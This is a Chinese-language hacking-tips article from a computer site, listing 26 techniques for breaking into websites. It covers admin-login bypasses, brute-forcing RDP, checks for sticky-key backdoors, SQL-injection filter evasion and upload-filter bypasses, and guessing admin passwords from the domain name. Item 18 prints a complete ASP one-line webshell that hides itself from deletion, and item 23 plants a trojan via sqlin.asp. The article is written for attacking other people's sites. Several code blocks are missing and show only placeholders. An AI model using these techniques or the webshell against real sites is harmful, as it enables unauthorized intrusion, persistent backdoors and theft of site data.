時間:2019-12-18來源:系統城作者:電腦系統城
1.利用網站過濾不嚴直接繞過后臺驗證,在網站后面加上 admin/session.asp 或 admin/left.asp
2.有的網站進后臺會出現一個腳本提示框,輸入:administrator 即可突破!admin代表以管理員身份進入的意思。
3.有的網站開了3389,入侵之前先去連接3389,嘗試弱口令或是爆破,再者就是按5次shift鍵,看看有沒前人裝過后門,然后再社工密碼。
4.有時候進后臺會彈出提示框“請登陸”,把地址抄寫出來(復制不了),然后放在網頁源代碼分析器里,選擇瀏覽器-攔截跳轉勾選–查看即可進入后臺!
5.突破防盜鏈訪問webshell,代碼:
復制代碼
回車后點擊GO即可進入webshell
6.突破一流信息監控攔截系統訪問,當小馬可以訪問,上傳大馬卻不行的時候,可以先用大馬跟一張圖片合并,在上傳合并后的圖片,接著數據庫備份后訪問即可!
7.在拿編輯器的shell時,有時增加了asp|asa|cer|php|aspx等擴展名上傳時都被過濾了,其實只要增加aaspsp 上傳asp就會突破了。
8.有時啊D猜出表段了,但是猜不到字段的時候,可以到后臺查看源文件,搜索ID或type,一般都能找到,再到啊D里添加字段進行猜解內容即可突破。
9.社工后臺密碼可以用這個技巧,假如網站域名是:exehack.Net 管理員名稱為admin,可以試試密碼“exehack”和“exehack.net”來登陸。
10.手工注入時如果網站過濾了 and 1=1 and 1=2 ,可以用xor 1=1 xor 1=2 進行判斷。
11.本地構造上傳一句話木馬,如果提示“請先選擇你要上傳的文件![ 重新上傳 ]” ,說明文件太小了,用記事本打開再復制多幾句話從而擴大文件大小,再上傳即可。
12.用啊d跑表,跑字段名name和pass出不來,顯示長度超過50什么的,猜解不出的情況下,這時放在穿山甲去跑一般都能跑出來!
13.猜管理員后臺小技巧,admin/left.asp、admin/main.asp、admin/top.asp、admin/admin.asp 會現出菜單導航,然后迅雷下載全部鏈接。
14.知道表名,字段,使用SQL語句在ACCESS數據庫中加個用戶名及密碼語句:
Insert into admin(user,pwd) values('test','test')
15.當獲得管理員密碼,卻拿不到管理員的帳號時,到前臺隨便打開一個新聞,找找諸如“提交者”“發布者”之類的字眼,一般“提交者”就是管理員的帳號了。
16.爆破ASP+IIS架設的網站web絕對路徑,假設網站主頁為:http://www.xxxxx/index.asp/ 提交http://www.xxxxx.cn/fkbhvv.aspx/,fkbhvv.aspx是不存在的。
17.源碼的利用,很多網站用的都是網上下載的源碼,有的站長很懶,什么也不改,然后就上傳開通網站了,我們可以去下載一套,里面有很多默認的信息值得利用。
18.把以下代碼上傳到webshell里,后綴是asp,就算別人發現了也刪除不了,算是超級防刪的一句話木馬了,可以很安全的留個后門,菜刀連接密碼:x
<%Eval(Request(chr(120))):Set fso=CreateObject("Scripting.FileSystemObject"):Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")):if f.attributes <> 39 then:f.attributes = 39:end if%>
19.當破解出帳號密碼卻找不到后臺的時候,可以嘗試鏈接ftp,假如域名是:www.baidu.com “ 得到的密碼為“bishi”,我們就可以試下用“xxxx”“xxxx.cn”www.xxxx.cn作為FTP 用戶名,用“bishi”:作為FTP密碼來進行登陸,成功的幾率可以很大的哦!ftp的默認端口:21 默認帳號密碼:test
20.有的后臺不顯示驗證碼,難道就沒法登錄了么? 其實把一段代碼導入注冊表里就可以突破這個困境了,把下面的代碼保存為Code.reg,雙擊導入就可以了!
復制代碼
21.當網站不允許上傳 asp、asa、php等文件時,我們可以上傳一個stm文件,代碼為:
復制代碼
(想查看什么文件就寫什么文件名,這里我假設想查看“conn.asp”),
然后直接打開這個stm文件的地址,再查看源代碼,“conn.asp”這個文件的代碼就一覽無遺了!
22.當網站不允許上傳ASP,CGI,CER,CDX,HTR等類型的文件時,嘗試上傳一個shtm文件,內容為:
復制代碼
如果上傳成功,那太好了,訪問地址就可以瀏覽conn.asp里的內容了,這樣一來,數據庫路徑也就到手啦!
23.手工檢測注入點彈出“你的操作已被記錄!”之類的信息,訪問這個文件:sqlin.asp,如果存在,在注入點后面植入一句話木馬:
‘excute(request(“TNT”))
接著用一句話木馬客戶端連接:http://www.xxx.com/sqlin.asp,上傳木馬即可拿下shell,因為很多防注入程序都是用”sqlin.asp“這個文件名來做非法記錄的數據庫。
24.旁注的話,肯定是挑支持aspx的站點來日了,問題是怎樣判斷呢?方法很簡單,在在網站后面加上xxx.aspx,如果返回“/”應用程序中的服務器錯誤,無法找到該資源,404畫面就說明支持aspx木馬。
25.網站后面加test.php 可以查看版本
26.禁忌這兩個網站后臺文件 admin_index.asp manage_login.asp
2020-08-31
針對全球SSH服務器的新型無文件P2P僵尸網絡悄然入侵?2020-08-31
TEAM TNT:竊取AWS憑證的加密貨幣挖礦蠕蟲2020-08-31
僵尸網絡可通過智能家居設備影響能源市場